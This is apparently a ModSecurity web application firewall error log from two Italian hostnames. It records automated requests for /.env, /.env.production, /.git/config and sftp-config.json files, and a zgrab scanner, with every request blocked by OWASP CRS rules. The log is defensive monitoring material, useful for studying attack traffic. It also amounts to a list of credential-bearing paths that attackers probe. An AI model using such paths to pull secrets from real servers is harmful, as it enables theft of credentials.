[Mon Aug 25 11:49:04.207993 2025] [:error] [pid 2219597] [client 195.178.110.109:41334] [client 195.178.110.109] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aKwxkOgDfPKZyTTlp1iBUAAAAAk"]
[Mon Aug 25 11:49:04.208146 2025] [:error] [pid 2219597] [client 195.178.110.109:41334] [client 195.178.110.109] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aKwxkOgDfPKZyTTlp1iBUAAAAAk"]
[Tue Aug 26 20:40:10.561261 2025] [:error] [pid 2241552] [client 45.130.203.227:50587] [client 45.130.203.227] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aK3_ijoRJp8QGcfk7oMv6gAAAAM"]
[Tue Aug 26 20:40:10.561515 2025] [:error] [pid 2241552] [client 45.130.203.227:50587] [client 45.130.203.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aK3_ijoRJp8QGcfk7oMv6gAAAAM"]
[Tue Aug 26 20:40:10.561678 2025] [:error] [pid 2241552] [client 45.130.203.227:50587] [client 45.130.203.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aK3_ijoRJp8QGcfk7oMv6gAAAAM"]
[Tue Aug 26 20:40:10.668070 2025] [:error] [pid 2258264] [client 45.130.203.205:46409] [client 45.130.203.205] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aK3_iinYQ3VTWFw6KkrTPwAAAAc"]
[Tue Aug 26 20:40:10.668274 2025] [:error] [pid 2258264] [client 45.130.203.205:46409] [client 45.130.203.205] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aK3_iinYQ3VTWFw6KkrTPwAAAAc"]
[Tue Aug 26 20:40:10.668424 2025] [:error] [pid 2258264] [client 45.130.203.205:46409] [client 45.130.203.205] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aK3_iinYQ3VTWFw6KkrTPwAAAAc"]
[Tue Aug 26 20:40:10.773936 2025] [:error] [pid 2258261] [client 45.130.203.203:36911] [client 45.130.203.203] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aK3_inbWrGm3ii9Cejuz2AAAAAE"]
[Tue Aug 26 20:40:10.774144 2025] [:error] [pid 2258261] [client 45.130.203.203:36911] [client 45.130.203.203] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aK3_inbWrGm3ii9Cejuz2AAAAAE"]
[Tue Aug 26 20:40:10.774287 2025] [:error] [pid 2258261] [client 45.130.203.203:36911] [client 45.130.203.203] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aK3_inbWrGm3ii9Cejuz2AAAAAE"]
[Fri Aug 29 23:43:33.502696 2025] [:error] [pid 2315264] [client 45.130.203.219:61923] [client 45.130.203.219] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aLIfBY3InCD95wSIz1cj5QAAAAA"]
[Fri Aug 29 23:43:33.504448 2025] [:error] [pid 2315264] [client 45.130.203.219:61923] [client 45.130.203.219] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aLIfBY3InCD95wSIz1cj5QAAAAA"]
[Fri Aug 29 23:43:33.504635 2025] [:error] [pid 2315264] [client 45.130.203.219:61923] [client 45.130.203.219] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aLIfBY3InCD95wSIz1cj5QAAAAA"]
[Sat Aug 30 11:31:56.160863 2025] [:error] [pid 2340031] [client 18.224.192.118:40583] [client 18.224.192.118] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aLLFDOt1e8pukI5_cIB3GAAAAAA"]
[Sat Aug 30 11:31:56.161286 2025] [:error] [pid 2340031] [client 18.224.192.118:40583] [client 18.224.192.118] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aLLFDOt1e8pukI5_cIB3GAAAAAA"]
[Sat Aug 30 11:31:56.161448 2025] [:error] [pid 2340031] [client 18.224.192.118:40583] [client 18.224.192.118] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aLLFDOt1e8pukI5_cIB3GAAAAAA"]
[Sun Aug 31 00:03:18.357525 2025] [:error] [pid 2363830] [client 176.65.148.43:41728] [client 176.65.148.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aLN1Jp52eDVCSRGzjmXfzgAAAAg"]
[Sun Aug 31 00:03:18.357839 2025] [:error] [pid 2363830] [client 176.65.148.43:41728] [client 176.65.148.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aLN1Jp52eDVCSRGzjmXfzgAAAAg"]
[Sun Aug 31 00:03:18.358004 2025] [:error] [pid 2363830] [client 176.65.148.43:41728] [client 176.65.148.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aLN1Jp52eDVCSRGzjmXfzgAAAAg"]
[Mon Sep 01 16:12:42.108782 2025] [:error] [pid 2392983] [client 5.189.185.32:44382] [client 5.189.185.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aLWp2q-5ziF0U_KiJyngGQAAAAw"]
[Mon Sep 01 16:12:42.110253 2025] [:error] [pid 2392983] [client 5.189.185.32:44382] [client 5.189.185.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aLWp2q-5ziF0U_KiJyngGQAAAAw"]
[Mon Sep 01 16:12:42.110434 2025] [:error] [pid 2392983] [client 5.189.185.32:44382] [client 5.189.185.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aLWp2q-5ziF0U_KiJyngGQAAAAw"]
[Mon Sep 01 16:12:42.256316 2025] [:error] [pid 2392983] [client 5.189.185.32:44382] [client 5.189.185.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aLWp2q-5ziF0U_KiJyngGgAAAAw"], referer: http://economiasolidale.test.indacotrentino.com/.git/config
[Mon Sep 01 16:12:42.256545 2025] [:error] [pid 2392983] [client 5.189.185.32:44382] [client 5.189.185.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aLWp2q-5ziF0U_KiJyngGgAAAAw"], referer: http://economiasolidale.test.indacotrentino.com/.git/config
[Mon Sep 01 16:12:42.256702 2025] [:error] [pid 2392983] [client 5.189.185.32:44382] [client 5.189.185.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aLWp2q-5ziF0U_KiJyngGgAAAAw"], referer: http://economiasolidale.test.indacotrentino.com/.git/config
[Tue Sep 02 06:31:46.124487 2025] [:error] [pid 2415608] [client 45.139.104.170:42510] [client 45.139.104.170] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aLZzMs67D_tc4QcEMTLL1QAAAAY"]
[Tue Sep 02 06:31:46.124857 2025] [:error] [pid 2415608] [client 45.139.104.170:42510] [client 45.139.104.170] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aLZzMs67D_tc4QcEMTLL1QAAAAY"]
[Tue Sep 02 06:31:46.125030 2025] [:error] [pid 2415608] [client 45.139.104.170:42510] [client 45.139.104.170] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aLZzMs67D_tc4QcEMTLL1QAAAAY"]
[Tue Sep 02 18:02:57.899885 2025] [:error] [pid 2415621] [client 45.130.203.183:33263] [client 45.130.203.183] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aLcVMXP7JCb6B-E1IA-2jAAAAAc"]
[Tue Sep 02 18:02:57.900118 2025] [:error] [pid 2415621] [client 45.130.203.183:33263] [client 45.130.203.183] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aLcVMXP7JCb6B-E1IA-2jAAAAAc"]
[Tue Sep 02 18:02:57.900286 2025] [:error] [pid 2415621] [client 45.130.203.183:33263] [client 45.130.203.183] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aLcVMXP7JCb6B-E1IA-2jAAAAAc"]
[Thu Sep 04 19:41:55.686055 2025] [:error] [pid 2466898] [client 93.123.109.7:44222] [client 93.123.109.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aLnPY3131ujzBjIgUSR7FQAAAAU"]
[Thu Sep 04 19:41:55.687589 2025] [:error] [pid 2466898] [client 93.123.109.7:44222] [client 93.123.109.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aLnPY3131ujzBjIgUSR7FQAAAAU"]
[Thu Sep 04 19:41:55.687756 2025] [:error] [pid 2466898] [client 93.123.109.7:44222] [client 93.123.109.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aLnPY3131ujzBjIgUSR7FQAAAAU"]
[Thu Sep 04 22:37:10.467438 2025] [:error] [pid 2466859] [client 194.233.80.217:60022] [client 194.233.80.217] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /prevlaravel/sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prevlaravel/sftp-config.json"] [unique_id "aLn4diTL2Jf_IOiVrys72gAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/prevlaravel/sftp-config.json
[Thu Sep 04 22:37:10.467439 2025] [:error] [pid 2466856] [client 194.233.80.217:60019] [client 194.233.80.217] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aLn4dtTeTYwjEZ6-0lefiQAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/sftp-config.json
[Thu Sep 04 22:37:10.467697 2025] [:error] [pid 2466856] [client 194.233.80.217:60019] [client 194.233.80.217] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aLn4dtTeTYwjEZ6-0lefiQAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/sftp-config.json
[Thu Sep 04 22:37:10.467697 2025] [:error] [pid 2466859] [client 194.233.80.217:60022] [client 194.233.80.217] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prevlaravel/sftp-config.json"] [unique_id "aLn4diTL2Jf_IOiVrys72gAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/prevlaravel/sftp-config.json
[Thu Sep 04 22:37:10.467859 2025] [:error] [pid 2466859] [client 194.233.80.217:60022] [client 194.233.80.217] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prevlaravel/sftp-config.json"] [unique_id "aLn4diTL2Jf_IOiVrys72gAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/prevlaravel/sftp-config.json
